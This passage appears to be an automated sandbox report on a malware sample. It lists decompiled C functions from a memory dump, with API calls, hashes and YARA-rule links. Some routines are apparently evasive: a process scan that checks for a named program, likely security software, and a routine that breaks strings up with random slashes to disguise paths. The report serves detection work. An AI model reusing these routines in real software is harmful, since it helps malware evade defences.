                                                                                                                          0x049721a0
                                                                                                                          0x049721a7
                                                                                                                          0x00000000
                                                                                                                          0x049721a9
                                                                                                                          0x049721a9
                                                                                                                          0x049721b6
                                                                                                                          0x00000000
                                                                                                                          0x049721b6

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(0497D2E4,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,0497555B,?,00000001,?), ref: 04972158
                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972165
                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972170
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,0497555B,?,00000001,?,00000002,?,?,049753C9,?), ref: 04972177
                                                                                                                            • Part of subcall function 049724BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,04972197,?,04972197,?,?,?,?,?,04972197,?), ref: 04972598
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559942907-0
                                                                                                                          • Opcode ID: 5e01b7b2af9fff5cc8ef8dd3bcb1833c89a955a5477075fb68030765c602a0e0
                                                                                                                          • Instruction ID: 49ebbc41f484bf654a6e6dba5da1624a1ff97231552a010da76a1da691f87053
                                                                                                                          • Opcode Fuzzy Hash: 5e01b7b2af9fff5cc8ef8dd3bcb1833c89a955a5477075fb68030765c602a0e0
                                                                                                                          • Instruction Fuzzy Hash: 8A214F72910219AFDF20AFE48884DAE77BDFF88394B0544B5EB51A7200E734B945CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049722D2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E049722D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E049775F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                          0x049722de
                                                                                                                          0x049722e2
                                                                                                                          0x049722e3
                                                                                                                          0x049722e4
                                                                                                                          0x049722e6
                                                                                                                          0x049722e8
                                                                                                                          0x049722eb
                                                                                                                          0x049722f0
                                                                                                                          0x04972387
                                                                                                                          0x0497238e
                                                                                                                          0x0497238e
                                                                                                                          0x049722f9
                                                                                                                          0x04972300
                                                                                                                          0x04972310
                                                                                                                          0x04972310
                                                                                                                          0x04972316
                                                                                                                          0x04972318
                                                                                                                          0x0497231d
                                                                                                                          0x04972326
                                                                                                                          0x0497232c
                                                                                                                          0x04972331
                                                                                                                          0x0497233c
                                                                                                                          0x04972340
                                                                                                                          0x04972342
                                                                                                                          0x04972343
                                                                                                                          0x0497234c
                                                                                                                          0x04972350
                                                                                                                          0x04972361
                                                                                                                          0x04972352
                                                                                                                          0x04972357
                                                                                                                          0x0497235c
                                                                                                                          0x0497236b
                                                                                                                          0x0497236b
                                                                                                                          0x04972340
                                                                                                                          0x04972371
                                                                                                                          0x04972377
                                                                                                                          0x04972377
                                                                                                                          0x04972380
                                                                                                                          0x04972385
                                                                                                                          0x04972385
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198164300-0
                                                                                                                          • Opcode ID: 428becd7602865de561e3ef65b3652404ec728d38fbf11cd7b7aa25e57c3b7bb
                                                                                                                          • Instruction ID: 790e973fea2f7fd67115a8ad1a1c408e9868ccdfa3b9f8eda87ee0292a9a9817
                                                                                                                          • Opcode Fuzzy Hash: 428becd7602865de561e3ef65b3652404ec728d38fbf11cd7b7aa25e57c3b7bb
                                                                                                                          • Instruction Fuzzy Hash: 24214175900209FFCB11DFA8C98499EBBB9FF89705B1041B9E941E7310EB34EA41CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049726DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E049726DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x497d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x497d288; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x497d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                          0x049726e5
                                                                                                                          0x049726e8
                                                                                                                          0x049726ee
                                                                                                                          0x04972706
                                                                                                                          0x04972708
                                                                                                                          0x0497270d
                                                                                                                          0x0497270f
                                                                                                                          0x04972712
                                                                                                                          0x04972714
                                                                                                                          0x04972717
                                                                                                                          0x04972719
                                                                                                                          0x04972719
                                                                                                                          0x0497271b
                                                                                                                          0x04972726
                                                                                                                          0x0497272b
                                                                                                                          0x0497273c
                                                                                                                          0x04972744
                                                                                                                          0x04972749
                                                                                                                          0x0497274c
                                                                                                                          0x0497274f
                                                                                                                          0x04972751
                                                                                                                          0x04972754
                                                                                                                          0x04972757
                                                                                                                          0x04972757
                                                                                                                          0x0497275a
                                                                                                                          0x04972765
                                                                                                                          0x0497276a
                                                                                                                          0x04972774

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04971A07,00000000,?,?,04974653,?,06FF95B0), ref: 049726E8
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04972700
                                                                                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04971A07,00000000,?,?,04974653,?,06FF95B0), ref: 04972744
                                                                                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04972765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1819133394-0
                                                                                                                          • Opcode ID: da0772bcccfd64a5ee2e58ac6fcee4fb8b1ef8a0e611daf8178dc69078d7eb3f
                                                                                                                          • Instruction ID: cb6961c987a0037eb753514ad5af62d310b55231968d03ee0f2f49bc956bc6ac
                                                                                                                          • Opcode Fuzzy Hash: da0772bcccfd64a5ee2e58ac6fcee4fb8b1ef8a0e611daf8178dc69078d7eb3f
                                                                                                                          • Instruction Fuzzy Hash: C911E572A00214BFD710CB69DD88D9EBFBEDFC0660F150276F504D7250EA74AE4597A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974A03, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04974A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x497d2e0; // 0x267a5a8
						_t2 = _t9 + 0x497ee3c; // 0x73617661
						_push( &_v264);
						if( *0x497d110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                          0x04974a0e
                                                                                                                          0x04974a18
                                                                                                                          0x04974a1c
                                                                                                                          0x04974a26
                                                                                                                          0x04974a57
                                                                                                                          0x04974a2d
                                                                                                                          0x04974a32
                                                                                                                          0x04974a3f
                                                                                                                          0x04974a48
                                                                                                                          0x04974a5f
                                                                                                                          0x04974a4a
                                                                                                                          0x04974a52
                                                                                                                          0x00000000
                                                                                                                          0x04974a52
                                                                                                                          0x04974a60
                                                                                                                          0x04974a61
                                                                                                                          0x00000000
                                                                                                                          0x04974a61
                                                                                                                          0x00000000
                                                                                                                          0x04974a5b
                                                                                                                          0x04974a67
                                                                                                                          0x04974a6c

                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04974A13
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 04974A26
                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 04974A52
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04974A61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 420147892-0
                                                                                                                          • Opcode ID: d132f9df45e833733f59ec612d1010d2f240b00cf909626bf5d6881185aec606
                                                                                                                          • Instruction ID: beed913501de0bdfbc2fa21ee85461ce03a6f11b663dbdf1e3c58f3c2b6fba6c
                                                                                                                          • Opcode Fuzzy Hash: d132f9df45e833733f59ec612d1010d2f240b00cf909626bf5d6881185aec606
                                                                                                                          • Instruction Fuzzy Hash: B4F0BB326041149BD720AB669D49DEB77ACEFC5714F0001B2F515D3001EA24EE4587A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974450, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x497d2a4; // 0x340
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x497d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x497d2a4; // 0x340
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x497d270; // 0x6c00000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                          0x04974450
                                                                                                                          0x04974457
                                                                                                                          0x049744a1
                                                                                                                          0x049744a3
                                                                                                                          0x049744a3
                                                                                                                          0x0497445b
                                                                                                                          0x04974461
                                                                                                                          0x04974466
                                                                                                                          0x0497446a
                                                                                                                          0x04974470
                                                                                                                          0x04974477
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04974479
                                                                                                                          0x0497447e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0497447e
                                                                                                                          0x04974480
                                                                                                                          0x04974488
                                                                                                                          0x0497448b
                                                                                                                          0x0497448b
                                                                                                                          0x04974491
                                                                                                                          0x04974498
                                                                                                                          0x0497449b
                                                                                                                          0x0497449b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(00000340,00000001,0497191C), ref: 0497445B
                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 0497446A
                                                                                                                          • CloseHandle.KERNEL32(00000340), ref: 0497448B
                                                                                                                          • HeapDestroy.KERNEL32(06C00000), ref: 0497449B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4109453060-0
                                                                                                                          • Opcode ID: 07a8a56af7413ccaa20aa73b94d51551687498011c7d889576829853cef84f9b
                                                                                                                          • Instruction ID: a5cbf647d177d36cc69aa6c09e50cd6fbee23362b4b9217697ce9ed59b4e719d
                                                                                                                          • Opcode Fuzzy Hash: 07a8a56af7413ccaa20aa73b94d51551687498011c7d889576829853cef84f9b
                                                                                                                          • Instruction Fuzzy Hash: C6F03071B44312EBFF205A35E989B063EECEF047A5B050230FD04E7181DB28EC0597A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04974B98, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E04974B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x497d364; // 0x6ff95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x497d364; // 0x6ff95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x497d364; // 0x6ff95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x497e823) {
					HeapFree( *0x497d270, 0, _t10);
					_t7 =  *0x497d364; // 0x6ff95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                          0x04974b98
                                                                                                                          0x04974ba1
                                                                                                                          0x04974bb1
                                                                                                                          0x04974bb1
                                                                                                                          0x04974bb6
                                                                                                                          0x04974bbb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04974bab
                                                                                                                          0x04974bab
                                                                                                                          0x04974bbd
                                                                                                                          0x04974bc2
                                                                                                                          0x04974bc6
                                                                                                                          0x04974bd9
                                                                                                                          0x04974bdf
                                                                                                                          0x04974bdf
                                                                                                                          0x04974be8
                                                                                                                          0x04974bea
                                                                                                                          0x04974bee
                                                                                                                          0x04974bf4

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 04974BA1
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04975390), ref: 04974BAB
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,04975390), ref: 04974BD9
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04974BEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: deba34731e64b47aa5a0696da749f887aeb3da3e899ca32d322026a03565877a
                                                                                                                          • Instruction ID: 5ba1a2416e89bbe62d543bf5868b79fb4127f2d3bb7d52a00f905013e4e9e769
                                                                                                                          • Opcode Fuzzy Hash: deba34731e64b47aa5a0696da749f887aeb3da3e899ca32d322026a03565877a
                                                                                                                          • Instruction Fuzzy Hash: E6F0B278608200DFFB188B64EA99F293BE9EB45704B044139E602D7251D628AC00DB14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04971EC1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E04971EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E049775F6(_t2);
				if(_t34 != 0) {
					_t30 = E049775F6(_t28);
					if(_t30 == 0) {
						E04974AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0497A971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0497A971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                          0x04971ec1
                                                                                                                          0x04971ecb
                                                                                                                          0x04971ecd
                                                                                                                          0x04971ed3
                                                                                                                          0x04971ed3
                                                                                                                          0x04971edc
                                                                                                                          0x04971ee0
                                                                                                                          0x04971eec
                                                                                                                          0x04971ef0
                                                                                                                          0x04971f64
                                                                                                                          0x04971ef2
                                                                                                                          0x04971ef2
                                                                                                                          0x04971ef6
                                                                                                                          0x04971efb
                                                                                                                          0x04971f00
                                                                                                                          0x04971f1a
                                                                                                                          0x04971f09
                                                                                                                          0x04971f09
                                                                                                                          0x04971f0d
                                                                                                                          0x04971f10
                                                                                                                          0x04971f15
                                                                                                                          0x04971f15
                                                                                                                          0x04971f1f
                                                                                                                          0x04971f47
                                                                                                                          0x04971f4d
                                                                                                                          0x04971f50
                                                                                                                          0x04971f21
                                                                                                                          0x04971f23
                                                                                                                          0x04971f2b
                                                                                                                          0x04971f36
                                                                                                                          0x04971f3b
                                                                                                                          0x04971f3b
                                                                                                                          0x04971f57
                                                                                                                          0x04971f5e
                                                                                                                          0x04971f5f
                                                                                                                          0x04971f5f
                                                                                                                          0x04971ef0
                                                                                                                          0x04971f6f

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A,?,06FF9618), ref: 04971ECD
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                            • Part of subcall function 0497A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04971EFB,00000000,00000001,00000001,?,?,04975405,00000000,00000000,73BB81D0,06FF9618), ref: 0497A97F
                                                                                                                            • Part of subcall function 0497A971: StrChrA.SHLWAPI(?,0000003F,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A,?,06FF9618,0000EA60,?), ref: 0497A989
                                                                                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04975405,00000000,00000000,73BB81D0,06FF9618,?,?,04972A8A), ref: 04971F2B
                                                                                                                          • lstrcpy.KERNEL32(00000000,73BB81D0), ref: 04971F3B
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04971F47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3767559652-0
                                                                                                                          • Opcode ID: c15754a064e0c89e47f4cf97fabdae82e74b8f2ad8fcc995737ccc347bfdea82
                                                                                                                          • Instruction ID: 27255c62feee2ec6b56a8affafeb8f743dcc30bb0597d1515374fd40b1c17faf
                                                                                                                          • Opcode Fuzzy Hash: c15754a064e0c89e47f4cf97fabdae82e74b8f2ad8fcc995737ccc347bfdea82
                                                                                                                          • Instruction Fuzzy Hash: 1121B172508255EFDB025FB8CC45AAE7FBDEF86684B1580B4F9049B311E734E9009BE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0497131E, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0497131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E049775F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                          0x04971333
                                                                                                                          0x04971337
                                                                                                                          0x04971341
                                                                                                                          0x04971346
                                                                                                                          0x0497134b
                                                                                                                          0x0497134d
                                                                                                                          0x04971355
                                                                                                                          0x0497135a
                                                                                                                          0x04971368
                                                                                                                          0x0497136d
                                                                                                                          0x04971377

                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,06FF9364,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 0497132E
                                                                                                                          • lstrlenW.KERNEL32(049750AD,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 04971335
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,049750AD,004F0053,06FF9364,?,?,?,?,?,?,049754EF), ref: 04971355
                                                                                                                          • memcpy.NTDLL(73B769A0,049750AD,00000002,00000000,004F0053,73B769A0,?,?,049750AD,004F0053,06FF9364), ref: 04971368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2411391700-0
                                                                                                                          • Opcode ID: 1b8216773a8b0373aad6a617d47e4571ed75eac7f915b55544730b099181de66
                                                                                                                          • Instruction ID: 6958264115a974994528f5b8699ad9b57a5deb7dc299d69ea8b8db20060f9556
                                                                                                                          • Opcode Fuzzy Hash: 1b8216773a8b0373aad6a617d47e4571ed75eac7f915b55544730b099181de66
                                                                                                                          • Instruction Fuzzy Hash: 3FF0F976900119BBDF11EFA9CC89C9F7BACEF892987154462FD04D7201EA35EA149BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 049738CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                          • lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 74227042-0
                                                                                                                          • Opcode ID: c1efbf11fae76dc02cf14e5bf5b1038807f6b8e9afd01c609126dbd0b65da744
                                                                                                                          • Instruction ID: 5e5db6826cf2f332f7796a2e5b5bde6f7e7c26db30f40f04f592f716f477d358
